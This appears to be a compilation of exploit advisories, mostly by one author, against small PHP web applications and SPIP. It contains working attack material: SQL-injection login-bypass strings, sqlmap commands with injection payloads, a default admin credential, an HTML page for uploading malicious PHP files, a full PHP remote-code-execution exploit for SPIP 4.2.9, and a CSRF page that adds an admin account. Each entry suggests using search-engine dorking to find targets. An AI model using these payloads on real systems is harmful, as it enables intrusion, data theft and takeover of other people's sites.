<pre><code>=============================================================================================================================================<br />| # Title : Supply Chain Management v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Supply_Chain_Management_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/scm-master/admin/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Student Result Management System v2.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Student-Result-Management-System-Using-PHP-V2.0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /edit-class.php?classid=1 <br /><br />[+] http://127.0.0.1/srms/edit-class.php?classid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Student Record System v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/09/Student_Record_System_In_PHP_With_Source_Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/Student-Information-system/my-profile.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Student Attendance Management System 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload PHP malicious files directly.<br /> <br />[+] Line 84 set url of target.<br /><br />[+] The path to upload the files : http://127.0.0.1/student_attendance/assets/uploads/<br /><br />[+] Save Code as html :<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Manage Settings</title><br /> <!-- Add your CSS links here --><br /> <style><br /> img#cimg {<br /> max-height: 10vh;<br /> max-width: 6vw;<br /> }<br /> </style><br /></head><br /><body><br /><br /><div class="card col-lg-12"><br /> <div class="card-body"><br /> <form action="" id="manage-settings"><br /> <div class="form-group"><br /> <label for="name" class="control-label">System Name</label><br /> <input type="text" class="form-control" id="name" name="name" value="Hacked BY indoushka" required><br /> </div><br /> <div class="form-group"><br /> <label for="email" class="control-label">Email</label><br /> <input type="email" class="form-control" id="email" name="email" value="indoushka4ever@gmail.com" required><br /> </div><br /> <div class="form-group"><br /> <label for="contact" class="control-label">Contact</label><br /> <input type="text" class="form-control" id="contact" name="contact" value="+213771818860" required><br /> </div><br /> <div class="form-group"><br /> <label for="about" class="control-label">About Content</label><br /> <textarea name="about" id="about" class="text-jqte" rows="5"><p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p></textarea><br /> </div><br /> <div class="form-group"><br /> <label for="" class="control-label">Image</label><br /> <input type="file" class="form-control" name="img" id="img" onchange="displayImg(this)"><br /> </div><br /> <div class="form-group"><br /> <img src="assets/uploads/1603344720_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg" alt="" id="cimg"><br /> </div><br /> <center><br /> <button type="submit" class="btn btn-info btn-primary btn-block col-md-2">Save</button><br /> </center><br /> </form><br /> </div><br /></div><br /><br /><script><br /> function displayImg(input) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> document.getElementById('cimg').src = e.target.result;<br /> }<br /> reader.readAsDataURL(input.files[0]);<br /> }<br /> }<br /><br /> function start_load() {<br /> // Implement your loading functionality here<br /> console.log("Loading started...");<br /> }<br /><br /> function end_load() {<br /> // Implement your end loading functionality here<br /> console.log("Loading ended...");<br /> }<br /><br /> function alert_toast(message, type) {<br /> // Implement your alert/toast notification here<br /> console.log(`${type}: ${message}`);<br /> }<br /><br /> document.getElementById('manage-settings').addEventListener('submit', function(e) {<br /> e.preventDefault(); // Prevent the default form submission<br /><br /> start_load(); // Start loading<br /><br /> var form = e.target;<br /> var formData = new FormData(form);<br /><br /> fetch('http://127.0.0.1/student_attendance/ajax.php?action=save_settings', {<br /> method: 'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(resp => {<br /> if (resp == 1) {<br /> alert_toast('Data successfully saved.', 'success');<br /> setTimeout(function() {<br /> location.reload(); // Reload the page after saving<br /> }, 1000);<br /> } else {<br /> // Handle error case if needed<br /> console.log('Error:', resp);<br /> }<br /> end_load(); // End loading<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> end_load(); // End loading<br /> });<br /> });<br /></script><br /><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online course registartion 1.0 Blind SQl INjection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2018/05/Online-course-registartion-Using-PHP.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : news-details.php?nid=if <====== inject here<br /><br />[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1//onlinecourse/news-details.php?nid=if --dbs<br /><br />---<br />Parameter: nid (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: nid=if' AND (SELECT 2934 FROM (SELECT(SLEEP(5)))FpMu) AND 'XUff'='XUff<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 4 columns<br /> Payload: nid=if' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178787a71,0x41555a676d41466755754547656455487a544c50476163444b6d6a684b744d506c6c4e4b4e654550,0x7178766271)-- -<br />---<br />[14:13:02] [INFO] the back-end DBMS is MySQL<br />web application technology: PHP, Apache 2.4.58, PHP 8.0.30<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[14:13:02] [INFO] fetching database names<br />available databases [1]:<br />[*] onlinecourse<br /><br /> <br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Insufficiently Protected Credentials in Texas Instruments Fusion Digital Power Designer v.7.10.1<br /><br /><br /><br />Credit: Gionathan Armando Reale<br /><br /><br />//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /># Product: Fusion Digital Power Designer - Version 7.10.1<br /># Vendor: Texas Instruments<br /># CVE ID: CVE-2024-41629<br /># Vulnerability Title: Insufficiently Protected Credentials<br /># Severity: Medium<br /># Author(s): Gionathan Armando Reale<br /># Date: 2024-08-15<br />#<br />#############################################################<br />Introduction:<br />An issue in Texas Instruments Fusion Digital Power Designer v.7.10.1 allows a local attacker to obtain sensitive information via the plaintext storage of credentials.<br /><br />Vulnerability PoC:<br /><br />1. Create a connection within the application that requires credentials.<br />2. Access the file "C:/Program Files (x86)/Texas Instruments/Fusion Digial Power Designer/data/prefs-shared.xml"<br />3. Notice the credentials stored as plaintext.<br /><br /><br /><br /><br />/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Taskhub v2.8.8 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 12345678<br /><br />[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : catproduct.php?catpro=6<br /><br />[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs<br /><br />[+] Parameter: catpro (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: catpro=6' AND 5853=5853-- KEle<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 15 columns<br /> Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.9 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // توليد الحمولة مع تضمين الأمر المراد تنفيذه<br /> return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // إعداد بيانات POST التي سيتم إرسالها إلى الهدف<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // تهيئة طلب HTTP باستخدام دالة cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // إضافة رؤوس مخصصة لتجاوز المنع<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // تنفيذ الطلب<br /> $response = curl_exec($ch);<br /><br /> // تحقق من وجود أخطاء في cURL<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// مثال على الاستخدام<br />$targetUrl = 'https://example/spip/'; // استبدل هذا بالعنوان الحقيقي<br />$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Traffic Offense 1.0 CSRF Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to create a file and inject PHP code.<br /><br />[+] save payload as poc.html <br /><br />[+] line 6,Set your target.<br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/traffic_offense\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
